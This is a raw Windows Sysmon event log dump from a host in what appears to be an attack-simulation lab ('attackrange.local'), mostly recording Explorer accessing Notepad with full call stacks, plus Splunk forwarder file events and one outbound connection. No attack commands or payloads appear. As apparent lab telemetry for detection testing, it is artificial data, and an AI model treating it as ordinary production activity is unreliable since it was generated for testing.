14:08:01.409{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2|C:\Windows\System32\SHLWAPI.dll+1d9a4|C:\Windows\System32\COMDLG32.dll+666ad|C:\Windows\System32\COMDLG32.dll+30b1a 10341000x80000000000000002203460Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.409{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2|C:\Windows\System32\SHLWAPI.dll+1d9a4|C:\Windows\System32\COMDLG32.dll+666ad|C:\Windows\System32\COMDLG32.dll+30b1a 10341000x80000000000000002203459Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.409{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46 10341000x80000000000000002203458Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.409{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\System32\SHELL32.dll+d18e0|C:\Windows\System32\SHELL32.dll+d180d|C:\Windows\system32\explorerframe.dll+29e56|C:\Windows\system32\explorerframe.dll+c7e6|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\USER32.dll+2ea96|C:\Windows\System32\USER32.dll+2e813|C:\Windows\System32\USER32.dll+2e6b2|C:\Windows\System32\USER32.dll+2e648|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32e2a|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+32d46|C:\Windows\System32\SHLWAPI.dll+2a3c2 23542300x80000000000000002203457Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.237{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7319FE0D1BCE2D87A6BAF4F568FC1CFB,SHA256=7ADCDDAA951242EA6928BFA39811EB5894E1307F033758960F992B77EB1202E1,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002203456Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:07:56.815{00000000-0000-0000-0000-000000000000}5828<unknown process>-tcptruefalse10.0.1.14win-dc-228.attackrange.local60708-false104.23.99.190-443https 23542300x80000000000000002203455Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.034{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=49269B27919695285BC2A284750C1D4C,SHA256=E680E8652B8D97C8B48E0046C3812BBDC2E0F4268D916F2FBD56E2F7D6111F05,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203454Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203453Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203452Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203451Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203450Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203449Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6497|C:\Windows\System32\shcore.dll+6387|C:\Windows\System32\shcore.dll+62fd|C:\Windows\System32\shcore.dll+620a|C:\Windows\System32\SHELL32.dll+cff37|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11ed7|C:\Windows\System32\USER32.dll+22a53|C:\Windows\SYSTEM32\ntdll.dll+a9764|UNKNOWN(FFFFF8037B8D88C8)|UNKNOWN(FFFFF5A6522B4978)|UNKNOWN(FFFFF5A6522AF625)|UNKNOWN(FFFFF5A6522B0B4A)|UNKNOWN(FFFFF5A6522FEF55)|UNKNOWN(FFFFF8037B5EFE03)|C:\Windows\System32\win32u.dll+2da4|C:\Windows\system32\DUser.dll+bebd|C:\Windows\system32\DUser.dll+bb02|C:\Windows\System32\USER32.dll+26924|C:\Windows\SYSTEM32\ntdll.dll+a9764|C:\Windows\System32\win32u.dll+10c4 10341000x80000000000000002203448Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203447Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203446Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203445Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6154|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b 23542300x80000000000000002203444Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.018{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A94FC02B7EA8D24CD9755CCA40A49773,SHA256=240932B9E58742F1743F331BA0283FC1EE748CF7BE9C6CDE955C156362796419,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002203443Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfdbd|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203442Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+1c0e5|C:\Windows\System32\SHELL32.dll+cfd39|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58612|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\system32\DUser.dll+17b15|C:\Windows\SYSTEM32\atlthunk.dll+1026|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000002203441Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:08:01.002{5ABCFE62-E9C0-6040-494E-00000000AD01}46043708C:\Windows\SYSTEM32\Notepad.exe{5ABCFE62-99F5-603E-8E07-00000000AD01}2576C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\shcore.dll+64c8|C:\Windows\System32\shcore.dll+6482|C:\Windows\System32\shcore.dll+617d|C:\Windows\System32\shcore.dll+5e3d|C:\Windows\System32\shcore.dll+5dcf|C:\Windows\System32\shcore.dll+5cd4|C:\Windows\System32\SHELL32.dll+cfd1d|C:\Windows\System32\SHELL32.dll+d0463|C:\Windows\System32\SHELL32.dll+d0394|C:\Windows\System32\SHELL32.dll+cfc42|C:\Windows\system32\explorerframe.dll+2dcc7|C:\Windows\system32\explorerframe.dll+2c732|C:\Windows\system32\explorerframe.dll+31a40|C:\Windows\system32\explorerframe.dll+5ebf9|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+58547|C:\Windows\system32\explorerframe.dll+cea7|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\COMCTL32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.1